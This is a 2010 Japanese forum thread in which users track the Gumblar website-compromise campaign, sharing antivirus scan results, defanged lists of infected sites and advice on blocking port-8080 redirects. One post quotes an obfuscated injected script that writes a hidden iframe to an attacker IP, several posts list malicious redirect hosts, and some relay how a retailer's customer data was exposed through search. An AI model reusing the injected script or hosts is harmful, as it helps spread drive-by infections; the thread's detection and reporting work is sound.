http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899

kenichikaki●com
スタパン涙目

>>502
http://www.virustotal.com/jp/analisis/26bd267c6d3356a64d30e95e5ca2ed0066288ffe7f3ce0748abc02ca0edec0fc-1270129048
トレンドマイクロだと?

520 :519:2010/04/01(木) 22:51:30
すまん、スクリプトが中途半端だったorz

10/42
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728

521 :名無しさん@お腹いっぱい。:2010/04/01(木) 23:21:24
なるほど、その通り。
ttp://blog.f-secure.jp/archives/50382769.html

522 :名無しさん@お腹いっぱい。:2010/04/01(木) 23:43:20
>>506
297B646F63756D656E742E777269746528756E65736361
7065282027253363253639253636253732253631
253664253635253230253665253631
253664253635253364253633253331
253330253230253733253732253633253364253237253638253734253734253730253361
253266253266253337253337253265253332253332253331

){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%37%2e%32%32%31

<iframe name=c10 src='http://77.221

523 :名無しさん@お腹いっぱい。:2010/04/01(木) 23:47:45
>>522んで
http://safeweb.norton.com/report/show?url=77.221.153.178

524 :名無しさん@お腹いっぱい。:2010/04/01(木) 23:59:11
MSEはGumblarに無力なのか・・・

525 :名無しさん@お腹いっぱい。:2010/04/02(金) 00:09:41
つか、>>2がきちんとできていればGumblarの方が無力なんだよ。

526 :名無しさん@お腹いっぱい。:2010/04/02(金) 01:46:30
いまグーグルキャッシュでメッセサンオー個人情報流出中で
2ch中が祭り状態だけどこれウイルス?
それともメッセの会社としての管理問題?
とにかく名前、TEL、メアドと大変だ

527 :名無しさん@お腹いっぱい。:2010/04/02(金) 02:21:30
>>526
流出の原因はシス管がうんこだから

528 :名無しさん@お腹いっぱい。:2010/04/02(金) 03:34:07
>>526
見たら近所の奴がいたw

529 :名無しさん@お腹いっぱい。:2010/04/02(金) 04:20:36

489 :名無しさん必死だな:2010/04/02(金) 04:14:02 ID:cjzI0flq0
319 名前: 厚揚げ(関東地方) 投稿日:2010/04/02(金) 03:53:06.39 ID:7g2sF8Sk
購入履歴のページもやばいが、ある語句をつけて検索すると、
会員ごとの個人情報を直接編集する「管理者向けページ」が山のように出てくる。
客から、住所変更の依頼を受けたときなんかに使うページなんだろう。
これをGoogleさまが、ご丁寧に全ページをキャッシュしている。

このページは、会員が自分で決めたパスワードがソースの中に丸出しになってるから、
平文のパスワードが個人情報とセットで流出・・・こりゃ前代未聞の流出事件じゃないか?

ていうか大前提として、客が入力した大切なパスワードを、平文で保存しちゃダメだろ。

エログッズの買ったものリスト、住所、氏名、電話、性別、生年月日、
自分で決めたパスワードがセットで流出って、被害甚大すぎるだろ・・・

被害者は、1秒でも早く、ネットで共通で使っているパスワードを変えるべき。

530 :名無しさん@お腹いっぱい。:2010/04/02(金) 04:25:15
496 :名無しさん必死だな:2010/04/02(金) 04:16:34 ID:cjzI0flq0
>>489の続き
さらに、ある文字列で単純にGoogle検索するだけで、
買い物かごシステムの管理者用設定変更ページが、検索結果の1番目に出てくる。
これはシステム上のトップレベルの権限だから、ディレクトリから何まですべての設定が参照できてしまう。

しかも、設定ファイルの置き場所も問題で、会員情報の全員分っぽい大元のCSVファイルと
ロックファイルが、public_htmlの下にまるだしで、URLさえ知ったら誰でもアクセスできる場所に
置いてあるし。いくらなんでも最低レベルだ・・・ザルすぎだろ・・・

俺はアクセスしなかったが、csvは、ちゃんとhtaccessで制限かけてあるんだろうな?
万が一、かけてなかったら・・・いったいどこのテストサイトだよ

531 :名無しさん@お腹いっぱい。:2010/04/02(金) 05:27:41
ついにCSVファイル直リンURLが来てしまったようですよ

532 :名無しさん@お腹いっぱい。:2010/04/02(金) 10:54:34
ん、ituneとQuickTimeの更新きてる
一応アップデートしとくか

533 :名無しさん@お腹いっぱい。:2010/04/02(金) 11:37:34
Appleは29日に88個のパッチが来てる
http://blog.f-secure.jp/archives/50382418.html

534 :名無しさん@お腹いっぱい。:2010/04/02(金) 12:30:04
88個・・・
狂気だろw

535 :名無しさん@お腹いっぱい。:2010/04/02(金) 12:41:07
>>524
Gumblar/8080
http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/

KatesKiller
http://support.kaspersky.co.jp/viruses/solutions?qid=208283462

この2点でチェックだけでいいよな。>>1テンプレ次は修正すべき。

536 :名無しさん@お腹いっぱい。:2010/04/02(金) 12:46:46
>>534
それでもこっちよりはマシw
ttp://blog.f-secure.jp/archives/50382769.html

537 :名無しさん@お腹いっぱい。:2010/04/02(金) 13:56:54
http://www.kakiko.com/check/?http://www.happylives.coms.hk/a/yazhouqu/2010/0401/41975.html

538 :名無しさん@お腹いっぱい。:2010/04/02(金) 14:36:21
>>536
Foxit Reader 3.2.1.0401で対応
警告ダイアログが出るようになった

539 :名無しさん@お腹いっぱい。:2010/04/02(金) 16:16:21
メッセサンオーもGumblarにやられたのか・・・

540 :名無しさん@お腹いっぱい。:2010/04/02(金) 16:23:23
関係ないだろ

541 :名無しさん@お腹いっぱい。:2010/04/02(金) 17:46:41
現在大学4年で就活中なわけだが、最近は企業の事業紹介サイトもガンブラに侵されてたりするから困る
求人サイトからURLを踏む前にチェック入れるのが手間すぎる

542 :名無しさん@お腹いっぱい。:2010/04/02(金) 17:57:25
>>541
>>2

543 :名無しさん@お腹いっぱい。:2010/04/02(金) 18:22:01
つーかさあ…ガンブラ撒いてるクズは
さっさと捕まるか殺されるか自殺しとけよ
捕まったら死刑じゃすまねぇからな


544 :名無しさん@お腹いっぱい。:2010/04/02(金) 18:49:43
はいw

545 :名無しさん@お腹いっぱい。:2010/04/02(金) 18:52:29
>>543
バカなのはわかったからとっとと>>2読め

546 :名無しさん@お腹いっぱい。:2010/04/03(土) 03:53:19
個人だったらSecunia Personal Software Inspectorでアップデートすればかんたん
http://www.forest.impress.co.jp/lib/inet/security/antiadspy/secuniapsi.html

547 :コテハン ◆8080adndqg :2010/04/03(土) 14:56:46
【陥落サイトのURL悪用厳禁】
www●mog-mmy●com/
www●ichiryuimono●com/
www●cashingalliance●com ←作りかけ放置?
※コードが途中で切れてるけど、いちおう...
www●tirashi●jp/ ←再掲載(絶賛放置中)
kadaru●mydns●to/tauchi-office/taikensyugi/ ←再掲載(絶賛放置中)
※kadaru●mydns●to/以下が全滅?


548 :コテハン ◆8080adndqg :2010/04/03(土) 18:29:48
【陥落サイトのURL悪用厳禁】
www●babys-b●com/


549 :名無しさん@お腹いっぱい。:2010/04/03(土) 19:00:12
そういやxreaのユーザー掲示板にwebmaster復活してるんだが
今アドレス送って掲示板に書き込めば403とか対処してくれるかも

550 :名無しさん@お腹いっぱい。:2010/04/03(土) 22:24:48
>>547
作りかけワロタwww
作者めまたやってくれましたな

551 :名無しさん@お腹いっぱい。:2010/04/03(土) 22:26:33
そういや最近カスペの検出力が落ちてないか?んでトレンドマイクロが上がって来たという
http://www.virustotal.com/jp/analisis/7378e619878ef1a422585f2b00cd59ef7d8508eb1d19713d7f75573344ffbd89-1270127899
http://www.virustotal.com/jp/analisis/26ae4dc8ed13843a5eba0195ad20ebaae717dfbe8e79e7c6664132b0e68079fb-1270129728
http://www.virustotal.com/jp/analisis/7aea9859778fd62be387bf5e2ed5efc3126ae5f7e094461d39956371a7ea4954-1270059628
http://www.virustotal.com/jp/analisis/f67be411f07ae4c9cb814111cd622875b58c607e38d30b373e6d9224a59a7fd9-1270059337
avast 4/4
Kaspersky 0/4
TrendMicro 3/4

552 :名無しさん@お腹いっぱい。:2010/04/04(日) 01:52:23
>>551
avast使いの人は検体送付してるよ(現に俺がそうだし)
キミがカスペ使いなら以下の検体を送付しる!
http://pc11.2ch.net/test/read.cgi/sec/1258817697/473

553 :コテハン ◆8080adndqg :2010/04/04(日) 03:55:26
ねむい・・・

【陥落サイトのURL悪用厳禁】
www●okjdr●com/
www●oracle-shop●net/


554 :名無しさん@お腹いっぱい。:2010/04/04(日) 21:23:10
これもっぽいな
www●golazo●jp/

555 :名無しさん@お腹いっぱい。:2010/04/04(日) 21:42:03
>>554
確認すた>>523だぬ。。。

556 :名無しさん@お腹いっぱい。:2010/04/04(日) 21:48:33
チェッカーのサイト落ちてる?

557 :名無しさん@お腹いっぱい。:2010/04/04(日) 21:57:25
>>555
情報thxです
最近の傾向についていけてなかったんで自分で見てもわからなかったわ
aguse GWでなぜかyahoo●comのフレームが見えたのがそれのダミーだったんだね

558 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:04:43
>>557
今の時点(こちらの環境)ではTOPのindexじゃなくて、他のindexが…
例: Last-Modified: Sun, 04 Apr 2010 03:34:43 GMT :  i/index.html

c767c●c2>2w1>●61>5_3>●w1w7>8c/_g_o_2>/wicn6●wp6h>pw’.bZ(/[w¥>_6c]/g, ’

77●221●153●178/go2/in●php

559 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:16:48
>>558
なるほろthxです
<!-- ad -->になごんだ

しかしこっちもaguse GWだと見た目はyahoocomのフレームだね

560 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:20:38
GENOウイルス?への誘導レスに注意
http://tsushima.2ch.net/test/read.cgi/news/1270379088/

こんな馬鹿もいるんだねw

561 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:23:54
>>559
jsファイルに弄った跡がなさそうなのとtopのindexにはヤホー米やらなんやらと思ったらaguseでとtopにも>>523出たお。。。

562 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:33:33
バックナンバーのindexにあるのも確認しました
トップは拾えないなあ

563 :名無しさん@お腹いっぱい。:2010/04/04(日) 22:43:52
やっとトップわかった!
/mado/か!
>>561さんthxですた

564 :コテハン ◆8080adndqg :2010/04/05(月) 14:34:45
面白いのがきましたよ〜

【陥落サイトのURL悪用厳禁】
デジタルアソシエーション株式会社
www●digital-as●co●jp/
\(^o^)/オワタ

565 :名無しさん@お腹いっぱい。:2010/04/05(月) 14:40:35
> ネットワーク分野においては、ますます重要視されるセキュリティーの問題を含め、
> ネットワークシステムの構築から開発、保守、運用に至るまで確実に進めて参ります。
> 常に、新しい技術を活用するに留まらず、経験あるスペシャリストが業務知識を十分駆使し、
> 課題の本質の調査、分析を徹底的に行うことから、始めます。

566 :名無しさん@お腹いっぱい。:2010/04/05(月) 15:19:09
digital-as>める凸完了

567 :名無しさん@お腹いっぱい。:2010/04/05(月) 15:51:31
こんな会社にシステムだのセキュリティだの語ってほしくないというのがみんなの総意だろうwwwww

>>566
凸おつ〜

568 :名無しさん@お腹いっぱい。:2010/04/05(月) 19:26:13
見に行ったら403 Forbiddenだった

569 :コテハン ◆8080adndqg :2010/04/05(月) 19:45:38
>>568
ぐーぐる先生の「きゃっしゅ」にのこってる・・・

570 :名無しさん@お腹いっぱい。:2010/04/05(月) 20:50:13
>>569
ついにセキュリティ関連企業までやられましたか
やれやれ

571 :名無しさん@お腹いっぱい。:2010/04/05(月) 22:07:48
>>564
再感染か修正漏れかしらないけれどダメだこりゃ。
www●digital-as●co●jp/service/index●html


572 :名無しさん@お腹いっぱい。:2010/04/05(月) 22:40:48
>>571
特に何ともないようだが

しかしトップページには何も告知が無い…さすがに出せないか

573 :名無しさん@お腹いっぱい。:2010/04/05(月) 22:59:27
>>572
/shared/openwin.js
ttp://www.virustotal.com/jp/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270456759

574 :名無しさん@お腹いっぱい。:2010/04/05(月) 23:14:59
>>573
もう修正されてるお。
Last-Modified: Mon, 05 Apr 2010 11:44:28 GMT

575 :571:2010/04/05(月) 23:16:41
>>572
いま行ったら消えてた。
「人間性を備えた技術集団」を目指すと、改竄は告知なしのこっそり修正になるのか。
胸が熱くなるな。

576 :名無しさん@お腹いっぱい。:2010/04/05(月) 23:49:53
まだある
Firefoxでwww●digital-as●co●jp/service/index●html
ソースの14行目の/shared/openwin.jsをクリック
ページをコピペしてvirustotalに投げてみそ

577 :名無しさん@お腹いっぱい。:2010/04/05(月) 23:59:26
>>576
http://www.kakiko.com/check/test.cgi?http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs
http://rd.or.tp/get.php?site=http%3A%2F%2Fwww%2Edigital%2Das%2Eco%2Ejp%2Fshared%2Fopenwin%2Ejs&act=view
http://www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js

キャッシュじゃにゃいのか?

http://online.us.drweb.com/result/?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fshared%2Fopenwin.js
>>573の修正後なぬで緑

578 :名無しさん@お腹いっぱい。:2010/04/06(火) 00:16:17
>>577のVTの結果

誰かが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270477188
File openwin.js received on 2010.04.05 14:19:48 (UTC)
Result: 0/39 (0.00%)

今、漏れが投げたの
http://www.virustotal.com/analisis/18f5d41467bfe3e00870d1e668df8f5fadec3bc0b041c8c97c1d78c14d39ae15-1270480147
File openwin.js received on 2010.04.05 15:09:07 (UTC)
Result: 0/39 (0%)

>>573はヒゲおじさんから次のうpだてで「Trojan.JS.Redirector.bt」だおって返事きてた。
かすぺユーザーは確認よろ。(VTは更新が遅いから)

579 :576:2010/04/06(火) 01:01:28
>>577
別PCで見たらなかったにゃ

580 :名無しさん@お腹いっぱい。:2010/04/06(火) 01:13:33
>>579
ノシ

時間も経ってるしとりあえず投げてみた。
http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270483429
File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
Result: 5/39 (12.82%)

まだ、更新されてないのね。

581 :名無しさん@お腹いっぱい。:2010/04/06(火) 01:15:57
>>580
× File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
○ File www.digital-as.co.jp.openwin.js received on 2010.04.05 16:03:49 (UTC)

582 :名無しさん@お腹いっぱい。:2010/04/06(火) 01:18:59
念のため
http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270455682
File www.digital-as.co.jp.index.html received on 2010.04.05 08:21:22 (UTC)
Result: 7/39 (17.95%)

http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270483925
File www.digital-as.co.jp.index.html received on 2010.04.05 16:12:05 (UTC)
Result: 7/39 (17.95%)

583 :名無しさん@お腹いっぱい。:2010/04/06(火) 01:32:58
相変わらずavastは頑張ってますな
ありがたやありがたや

584 :名無しさん@お腹いっぱい。:2010/04/06(火) 02:19:15
digital-as●co●jp中の人がスレに常駐してたっぽいなw
こんなところを見てる暇があったら「告知(お詫び)」書け。

■サイト改ざん(1)「告知せず」で感染拡大の恐れ〜負の連鎖を断ち切るために
ttp://www.so-net.ne.jp/security/news/library/2112.html
>改ざんされたサイトを閲覧し、不幸にもウイルスに感染してしまった人たちは、
あなた方が知らせなければ、今も感染に気付かないままでいる可能性が高いのだ。
>Webサイトの管理者や運営者の方たちは、できるだけ迅速に改ざんされていた期間と場所を告知し、
この負の連鎖を断ち切れるよう尽力いただきたい。

■インシデント報告の届出(JPCERT/CC)
https://www.jpcert.or.jp/form/
報告もしろよ>digital-asの糞シス管

585 :名無しさん@お腹いっぱい。:2010/04/06(火) 03:19:03
>>584
>>566さんとは別に漏れもめるぽした時にセキュリティ通信のそのアドレスも含めて送ったお。
toで同時に送ったCPIからは返事きてた。
JPCERT/CCにはccで同時に送ったお。

デジタルアソシエーション 株式会社 にはせめてIPAに自社のホームページが改竄を受けてトロイをばら撒いていたことを自己申告してほしい。


   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)       `'ー---‐´


いかんな、もう修正されたしいい加減スルーするとこだけど>>565だからなぁ…

586 :名無しさん@お腹いっぱい。:2010/04/06(火) 04:37:15
>>585
【主な取引先】
NECシステムテクノロジー株式会社
株式会社NTTデータアウラ
株式会社NTTデータ関西
株式会社大阪第一食糧
京セラ コミュニケーションシステム株式会社
スミセイ情報システム株式会社
住友化学システムサービス株式会社
デジタルプロセス株式会社
ニッセイ情報テクノロジー株式会社
日本電話施設株式会社
パナソニックAVCマルチメディアソフト株式会社
株式会社日立システムアンドサービス
株式会社富士通九州システムズ
富士通テン株式会社
富士電機ITセンター株式会社
三井情報株式会社
安川情報システム株式会社

日本アイ・ビー・エム株式会社
みずほ銀行
三井住友銀行
りそな銀行


上記の企業を相手に商売してて「逃げ(告知無し)」がバレたら
倒産フラグ成立間違いなしだろうなw


587 :名無しさん@お腹いっぱい。:2010/04/06(火) 04:47:17
>>586
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

http://www.nca.gr.jp/member/index.html
ここの会員でJPCERT/CCから情報の共有があって、関連会社との連携が深ければ ぁぅぁぅ

588 :名無しさん@お腹いっぱい。:2010/04/06(火) 09:46:26
>>586
どうせ特定派遣で人材出してるだけだろうから
派遣されてるヤツが派遣先で問題起こしたとかじゃなければあんまり影響ないよ。
取引先のWebサイトとかを制作してたとか、
顧客のPCをGumbler攻撃で感染させちゃったとかなら契約切られる可能性もあるが…



589 :名無しさん@お腹いっぱい。:2010/04/06(火) 11:46:37
銀行系にはそんなずさんな企業と取引があることが
信用不安になるからそれなりに効果ありそうだけどね。

590 :名無しさん@お腹いっぱい。:2010/04/06(火) 11:51:42
釈明報も掲示しないで隠蔽しようとする会社って…

591 :名無しさん@お腹いっぱい。:2010/04/06(火) 12:02:14
銀行は単に融資を受けてるだけじゃねw
融資銀行だって取引先に書くだろうし、この程度で信用不安になるなら
もっとマスコミが騒ぎ立てるだろ…

592 :コテハン ◆8080adndqg :2010/04/06(火) 12:56:51
【陥落サイトのURL悪用厳禁】
中途半端なコード撤去、再改竄、絶賛放置中とか・・・
posh-e●com/index10●htm
pacific-staff●net/
hoikuen●19th●org/
cre2cash●2pg●in/ ←朝日オート(sunrise●2pg●in/)と同じく<!--<script>-->


593 :名無しさん@お腹いっぱい。:2010/04/06(火) 13:00:55
>>592
コメントアウトとかアホな対応してるな…

594 :名無しさん@お腹いっぱい。:2010/04/06(火) 13:26:54
> <!--<script>-->
これって一応、無効化してるんだ

595 :名無しさん@お腹いっぱい。:2010/04/06(火) 19:22:28
>>592
醤油みてる最中だけど新型?
> hoikuen●19th●org/
bestdarkstar●info:8080

596 :名無しさん@お腹いっぱい。:2010/04/06(火) 19:32:58
自己レス
91.121.117.37
gnomeさんとこで確認すた。。。

597 :名無しさん@お腹いっぱい。:2010/04/06(火) 19:34:59
94.23.159.128になった。
これもgnomeさんとこで確認

598 :名無しさん@お腹いっぱい。:2010/04/06(火) 19:43:41
>>592
あーーっ!
> hoikuen●19th●org/

http://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php

.info 浸食


599 :名無しさん@お腹いっぱい。:2010/04/06(火) 19:43:52
</script><noscript><div style="position:absolute;">
<img width=1 height=1 alt="" src="http://b3.yahoo.co.jp/b?P=
FBGG7XxTw7GuMbELS3k.QhJAeWYvBUu7D_gAAyR9&T=13vm0jrtv%2fX%3d1270
550520%2fE%3d2079744651%2fR%3djp_r25%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY
%3djp%2fF%3d3785814215%2fQ%3d-1%2fS%3d1%2fJ%3d52C3537C"></div></no
script>
これは?

600 :名無しさん@お腹いっぱい。:2010/04/06(火) 20:00:10
>>595
かぶった

>>597
いまはこの5個セット
195.160.200.36 GB:AS44949 (GIGACODES)
77.241.93.114 BE:AS34762 (COMBELL)
91.121.117.37 FR:AS16276 (OVH)
91.121.169.6 FR:AS16276 (OVH)
94.23.159.128 FR:AS16276 (OVH)

OVH死ねよ

601 :名無しさん@お腹いっぱい。:2010/04/06(火) 20:06:28
>>599

ビーコン用GIFかな

602 :名無しさん@お腹いっぱい。:2010/04/06(火) 20:37:10
>>592
sunrise●2pg●inも変わってる
-> snoreflash●ru:8080

603 :名無しさん@お腹いっぱい。:2010/04/06(火) 20:44:20
2pg●in消えたっぽい?
>>602ソースアーカイブでけんかった。。。orz....

604 :コテハン ◆8080adndqg :2010/04/06(火) 21:28:33
>>595-603
天然で新型を引っ張ってたみたいだぬ(苦笑)


605 :名無しさん@お腹いっぱい。:2010/04/06(火) 21:55:01
>>598
.ruドメイン管理厳格化の影響だな
次は.infoか…

606 :名無しさん@お腹いっぱい。:2010/04/06(火) 22:10:45
>>564-591
【お詫び】ホームページ改ざん被害について
Last-Modified: Tue, 06 Apr 2010 12:53:17 GMT ttp://www.digital-as.co.jp/newstopics/2010/04/post-8.html

607 :名無しさん@お腹いっぱい。:2010/04/06(火) 22:23:39
>>606
これ、説明として正しいのか?
自分とこの管理用PCが感染して、それでサイト更新しただけだろ?

608 :名無しさん@お腹いっぱい。:2010/04/06(火) 22:38:51
本当に管理用PCだけが感染してたかはわからんしな
他にもあるんじゃなかろうか

まあでも一応不正アクセスではあるんじゃね
広義では、管理者の意図しないアクセス=不正アクセスらしいからな

609 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:00:32
やはりOS再インストールしろとは書かないのね…

610 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:22:46
書けないでしょね。。。



>>573-582あたりの続き

http://www.virustotal.com/analisis/d51b3fc0767a5a66e25a06bbc462e31357516a724f334a96a27982fcec06ce78-1270563397
File www.digital-as.co.jp.openwin.js received on 2010.04.06 14:16:37 (UTC)
Result: 7/38 (18.43%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
GData 19 2010.04.06 JS:Illredir-AL
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AB
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

http://www.virustotal.com/analisis/ed0ebd67eb843594cb0b87476e488e1e0fe44c32bc8afd85d2feef157372cf78-1270563154
File www.digital-as.co.jp.index.html received on 2010.04.06 14:12:34 (UTC)
Result: 11/39 (28.21%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
BitDefender 7.2 2010.04.06 Trojan.JS.Clicker.ABW
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.06 Trojan.JS.Clicker.ABW
GData 19 2010.04.06 Trojan.JS.Clicker.ABW
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AA
nProtect 2009.1.8.0 2010.04.06 Trojan.Script.397566
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

611 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:25:29
んで>>595-603あたりでやった分

http://www.virustotal.com/analisis/9afe33fa08cea6979affa902512999d9df95078a07290cdef0aeda02b9b7370e-1270556815
File hoikuen.19th.org.html received on 2010.04.06 12:26:55 (UTC)
Result: 2/39 (5.13%)
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
NOD32 5003 2010.04.06 JS/TrojanDownloader.Pegel.AA

ソースだけにしたブツ
http://www.virustotal.com/analisis/5f943b2b2e48467b0a934a6eb5eac41319ed71c9fe3a5b71346cabfe2446dc1f-1270557088
File 19th.org.txt received on 2010.04.06 12:31:28 (UTC)
Result: 0/39 (0%)

612 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:34:57
>>610
avast以外のフリー系には期待出来んな

613 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:39:46
>>612
得手不得手があるよ
Gumblar.xだとAVGがよかったりする。
>>611はほぼ全滅なぬで国ドメイン(IPアドレス)変えただけでも脅威になるのね。。。
個人的にイパーイ検体出してるけどユーザーじゃないから届いてないかもしれにゃい。。。orz.....

614 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:47:08
>>613
メールなら関係ないと思う
俺はユーザーだけどメールで検体出してるし、2回ほど返事が来たこともある
まぁavastはめったに返事来ないがな

615 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:47:23
>>606
>2. 不正アクセスにより改ざんされた対象期間
2010年3月25日(木)6:00 〜 2010年4月5日(月)23:00

>>564 :コテハン ◆8080adndqg :2010/04 /05(月) 14:34:45
ここに投下されて凸られるまで「気づかなかった」としたら最悪だなwww

616 :名無しさん@お腹いっぱい。:2010/04/06(火) 23:57:13
>>614
AVGはツンデレ(死語)でねぇ、一度も返事がなかったんだけど
解パス間違えて送ったら、パス合わねぇーって返事北。
同時に出したかすぺはパス解読して対応の返事北。w

>>615
注意:醤油に反応する場合があります。
Last-Modified: Thu, 01 Apr 2010 13:17:22 GMT : ttp://megalodon.jp/2010-0405-1616-22/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww.digital-as.co.jp%2Fcompany%2Findex.html
多分気づかなかったんですね

617 :名無しさん@お腹いっぱい。:2010/04/07(水) 00:04:58
>>616
1回は検体提出感謝の返事がスペルミス付きで来たw
1回は添付忘れて送ったら、4日後に「添付がねぇ」ってサポートからメール来た

618 :名無しさん@お腹いっぱい。:2010/04/07(水) 00:08:09
>>617
みんなやっちゃうなぁw

ここんとこパス合ってるけど圧縮ファイル名間違えて送ること数回。
顰蹙買い捲ってそうです><

619 :名無しさん@お腹いっぱい。:2010/04/07(水) 10:19:02
>>615
期間長っ! 終わってるな・・・

620 :名無しさん@お腹いっぱい。:2010/04/07(水) 10:30:36
>>612
スクリプトが検知できないから期待できないと言うのは早漏だろ。
スクリプトを踏んだ時点で検知できればそれに越したことはないが
肝心なのは現物がDLされる前に検知できるかであって
検知できれば結果は同じことだ。


その現物を持っていないから検知できるか知らんけどね。

621 :名無しさん@お腹いっぱい。:2010/04/07(水) 14:23:39
bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?
>>2はやってるはず。adobe readerは半年以上前にアンインストールしてある

622 :コテハン ◆8080adndqg :2010/04/07(水) 14:29:24
重複してるのはぢめて見た・・・

【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/ ←絶賛放置中

hXXp://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
コードは>>598と同じなんだけど・・・
<!--562ba23ffcf28efa4f71fc787258d3d3-->
<!--e62178df1fa90a28d1b2efa8443ab220-->
謎の文字列が謎...

623 :名無しさん@お腹いっぱい。:2010/04/07(水) 14:29:33
はずじゃなんとも言えませんなあ
心配ならOS入れなおし推奨

624 :名無しさん@お腹いっぱい。:2010/04/07(水) 14:31:48
このスレで質問しても無駄だぜ
「感染してるかもと思ったんならクリーンインストールしろ!」で終わりだから

実際それが一番確実だろうしな

625 :名無しさん@お腹いっぱい。:2010/04/07(水) 14:32:37
info:8080の拡散が始まった?
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fwww.jc-consulting.jp%2F&x=23&y=13

at:8080
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fnetnavi.boo.jp%2Fleopalace%2Flink%2F&x=55&y=12

やばいねー

626 :名無しさん@お腹いっぱい。:2010/04/07(水) 14:36:57
引き続き*:8080/をブロックでおkかな?

627 :コテハン ◆8080adndqg :2010/04/07(水) 14:49:44
【陥落サイトのURL悪用厳禁】
www●toutyann●com/

hXXp://snoreflash●ru:8080/360-cn/google●com/thesun●co●uk●php

また重複しとる...

628 :名無しさん@お腹いっぱい。:2010/04/07(水) 15:01:26
>>626
いいんじゃね。
8080全弾きは誤爆するという奴もいるけど、そんな事例見たことないし。

629 :コテハン ◆8080adndqg :2010/04/07(水) 15:03:56
>>625
hXXp://helphomecare●at:8080/ultimate-guitar-com/google●com/livedoor●biz●php
at:8080/もでつか・・・ orz

>>626 *:8080/* ブロックでおk。
巻き込みで阻止られるサイトはURLが悪い(笑)

630 :名無しさん@お腹いっぱい。:2010/04/07(水) 15:12:04
仮に :8080/ がアドレスに含まれる真っ当なサイトがあったとしても、そのときは一時的に
ブロックを解除すればいいだけだしな。

631 :名無しさん@お腹いっぱい。:2010/04/07(水) 16:37:19
http://rd.or.tp/get.php?site=http%3A%2F%2Fwww.jde-net.co.jp%2F&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none

http://rd.or.tp/get.php?site=http%3A%2F%2Fwww.chanwoomul.net%2FNicecart4plus%2FShop%2FMember%2Fjoin_agree.html+&act=view&ua-freetext=Mozilla%2F4.0+%28compatible%3B+MSIE+8.0%3B+Windows+NT+6.1%3B+Trident%2F4.0%29&ua=none

> Found iFrame!
誤検出かな?

632 :名無しさん@お腹いっぱい。:2010/04/07(水) 16:49:11
>>631
上: 269, 270
下: 1053, 1054

にそれぞれ<iframe></iframe>があるぜぃ

633 :名無しさん@お腹いっぱい。:2010/04/07(水) 16:52:31
Avira10premium使ってみたがwebリダイレクトは問答無用でブロック。
offにするにはwebGuardを無効にするしかない。i-frameに対する設定は出来る。
なんでもクリックするヤツには良いかもしれん。

634 :名無しさん@お腹いっぱい。:2010/04/07(水) 17:48:38
>>631
jde-net●co●jp センセイの診断結果
>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

